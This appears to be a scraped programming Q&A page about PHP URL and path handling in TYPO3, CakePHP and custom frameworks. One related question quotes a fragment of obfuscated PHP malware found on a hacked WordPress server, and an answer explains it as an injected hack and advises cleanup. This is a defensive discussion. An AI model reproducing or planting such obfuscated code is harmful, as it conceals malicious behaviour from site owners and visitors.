I hope I can manage to explain this problem...
I have an T3-extension that handles shared content.
In this shared content, we have links (page-ids) that are defined and converted into something like /en/clients/contact, using
$cObj = t3lib_div::makeInstance('tslib_cObj');
$href = $cObj->getTypoLink_URL($linkValue); // $linkValue is an integer (e.g. 153)
This works fine - until I change the language on the page. Then, the last used URL kinda «sticks» and the language indicator isn't present in the URL anymore.
Means:
call the german page -> works
change to english -> works
change back to german -> the english link is presented.
So the above link turns out like clients/contact (the leading slash is gone as well).
Oddly enough, I have a local installation of the same page where the problem doesn't occur. It's just on the page that's online.
I tried to find differences in the configuration, but there aren't any.
The only difference I could find so far is, that I use Typo3 v4.5.35 for the local installation and v4.7.17 for the online installation.
Any ideas???
This was very odd... but, I found a solution.
Instead of using $cObj->getTypoLink_URL($linkValue); I'm using this:
$configurations['additionalParams'] = "&L=".(int)t3lib_div::_GP('L');
$configurations['returnLast'] = 'url'; // get it as URL
$configurations['parameter'] = $linkValue;
$href = $cObject->typolink(NULL, $configurations);
It seems that when I created the $cObj, the L-Parameter got lost somewhere, somewhen. By adding it manually, the Link works as expected.
Related
Sorry if this is the wrong site to post on.
Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:
<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3##G9CJJ");
${YkT1GO68Y3rXB(",g0##&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh\"Co[")} = lpkBre6("*77#0>A-DE6#6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");
I have never seen code like this before. Can anyone tell me what it is exactly doing?
This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.
You should remove this code and update all your plugins.
Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.
If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.
Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from Wordpress.org.
I'm currently building a simple MVC framework and I've hit a bit of a road block in terms of breaking the URL down on a localhost but also having it work on a live production server as well.
So basically, my localhost URL is:
localhost/project/public/controller/action
The live version would be:
www.example.com/controller/action
My initial thought was to just use $_SERVER['REQUEST_URI'] which will work perfectly on a live server but on my localhost it returns:
/project/public/controller/action
What I need is:
controller/action
I've had a search around and the only answer I could find was to set up a virtual host which I don't really want to do - this code will be shared between people who may or may not know how to set that up so I want to avoid it if possible.
EDIT: For the record - this is the answer I found - How to get the same $_SERVER['REQUEST_URI'] on both localhost and live server
I also can't remove /project/public/ because this folder structure won't always be the same.
So I basically need to get the path up until the public/ part but I can't even use that because the public folder may be called something else.
I know this must be possible because frameworks such as Laravel do it but even looking at the source for that - I can't quite figure it out.
Thanks for any help.
EDIT: Possible Answer
It's odd how often you have a brainwave as soon as you post something...
I've had the thought that I can just run basename(DIR) at my entry point which will give me the folder's name regardless of what it is. I can then use that to remove everything before (in including) the first instance of that folder.
I'll try this out but if there are more elegant solutions out there, I'd still like to hear them.
I also can't remove /project/public/ because this folder structure won't always be the same.
But i assume, you'll always have controller and action parts? If yes, then do this:
$uriParts = explode('/', $_SERVER['REQUEST_URI']);
$count = count($uriParts);
$controller = isset($uriParts[$count - 2]) ? $uriParts[$count - 2] : null;
$action = isset($uriParts[$count - 1]) ? $uriParts[$count - 1] : null;
Try this to get ending string from your REQUEST_URI which isn't part of the server path:
substr($_SERVER['REQUEST_URI'], strlen(dirname($_SERVER['SCRIPT_NAME'])));
I'm designing a web application that can be customized based on which retail location the end user is coming from. For example, if a user is coming from a store called Farmer's Market, there may be customized content or extra links available to that user, specific to that particular store. file_exists() is used to determine if there are any customized portions of the page that need to be imported.
Up until now, we've been using a relatively insecure method, in which the item ID# and the store are simply passed in as GET parameters, and the system knows to apply them to each of the links within the page. However, we're switching to a reversible hash method, in which the store and item number are encrypted (to look something like "gd651hd8h41dg0h81"), and the pages simply decode them and assign the store and ID variables.
Since then, however, we've been running into an error that Googling extensively hasn't found me an answer for. There are several similar blocks of code, but they all look something like this:
$buttons_first = "../stores/" . $store . "/buttons_first.php";
if(file_exists($buttons_first))
{
include($buttons_first);
}
(The /stores/ directory is actually in the directory above the working one, hence the ../)
Fairly straightforward. But despite working fine when a regular ID and store is passed in, using the encrypted ID throws this error for each one of those similar statements:
Warning: file_exists() expects parameter 1 to be a valid path, string given in [url removed] on line 11
I've had the script spit back the full URL, and it appears to be assigning $store correctly. I'm running PHP 5.4.11 on 1&1 hosting (because I know they have some abnormalities in the way their servers work), if that helps any.
I got the same error before but I don't know if this solution of mine works on your problem you need to remove the "\0" try replace it:
$cleaned = strval(str_replace("\0", "", $buttons_first));
it worked on my case.
Run a var_dump(strpos($buttons_first,"\0")), this warning could come up when a path has a null byte, for security reasons. If that doesn't work, check the length of the string and make sure it is what you'd expect, just in case there are other invisible bytes.
It may be a problem with the path as it depends where you are running the script from. It's safer to use absolute paths. To get the path to the directory in which the current script is executing, you can use dirname(__FILE__).
Add / before stores/, you are better off using absolute paths.
I know this post was created on 2013 but didn't saw the common solution.
This error occurs after adding multiple to the file submit form
for example you are using files like this on php: $_FILES['file']['tmp_name']
But after the adding multiple option to the form. Your input name became file => file[]
so even if you post just one file, $_FILES['file']['tmp_name'] should be change to $_FILES['file']['tmp_name'][0]
I'm using CakePHP 2.0.4, PHP 5.3.1, Apache 2.2.14.
For example: the filename is F#7m7~1.gif. It really exists, the path and filename are correct.
Before print HTML tag, I encode it by using urlencode() and the tag goes like:
<img src="/chord/img/chords/F%2523m7~1.gif" alt="F#m7">
But the image is not loading. ('Chord' is a CakePHP Plugin)
I also tried to load it directly on the browser, http://myapp.localhost/chord/img/chords/F%2523m7~1.gif but what I get is: "Missing Controller Error: Chord.ImgController could not be found."
Everything works fine with the file as A~1.gif, but it brokes with filenames such as F#m~1.gif, B(7)~1.gif etc.
Everthing was working ok in pure PHP coded version. Now, it's not working at CakePHP.
Is there anybody have a clue?
You seem to be double-encoding it, the right urlencode for F#7m7~1.gif is F%237m7~1.gif, not F%2523m7~1.gif. Just remove one of them.
The Missing Controller error is just because there is no such file on your server, so Cake thinks you're trying to call an ImgController, within the Chord plugin. Try http://myapp.localhost/chord/img/chords/F%237m7~1.gif, it should work.
Anyway, as #GordonM pointed out, it's best to stick with normal characters for filenames.
I have been working on a content management system (nakid) and one of my toughest challenges is the file navigation. I want to make sure the file paths and settings work on local and remote servers. Right now my setup is pretty much something like this:
first.php (used by all pages):
//Set paths to nakid root
$core['dir_cur'] = dirname(__FILE__);
$core['dir_root'] = $_SERVER['DOCUMENT_ROOT'];
//Detect current nakid directory
$get_dirnakid_1 = str_replace("\\","/",dirname(__FILE__));//If on local
$get_dirnakid_2 = str_replace("/includes/php","",$get_dirnakid_1);
$get_dirnakid_3 = str_replace($_SERVER['DOCUMENT_ROOT'],"",$get_dirnakid_2);
//remove first "/"
if(substr($get_dirnakid_3, 0,1) == "/"){
$get_dirnakid_3 = substr($get_dirnakid_3, 1);
}
//Set some default vars
$core['dir_nakid_path'] = $get_dirnakid_3;
$core['dir_nakid'] = $core['dir_root']."/".$core['dir_nakid_path'];//We need to get system() for this real value - below
The reason I also did it this way is because I want the directory that this program is sitting in to be anywhere on the server ie(/nakid)(/cms)(/admin/cms)
I'm positive I am doing something the wrong way or that there is a simpler way to take care of all this.
If it helps to get a closer look at the code and how everything is being used I have it all up at nakid.org
EDIT: Just realized what I have at nakid.org is a little different than my newly posted code, but the same idea still applies to what I am attempting to do.
By and large, it looks okay to me.
You might want to give the variables more speaking names (e.g. nakid_root_dir, nakid_relative_webroot and so on.)
Remember when converting \ to / in path names: Whenever you match another directory name to one of those settings, you need to str_replace("\\","/"...) in those too.
I don't understand what you aim at with $get_dirnakid_2, though. Why will you screw up my path if I install your application in a directory that happens to be named /etc/includes/php/nakid?
Anyway, you should make those settings user overwritable as well. Sometimes, the user may want to set different settings from what you get from DOCUMENT_ROOT and consorts.
I don't fully understand what you try to get, but maybe getcwd() is what you look for:
http://www.php.net/manual/en/function.getcwd.php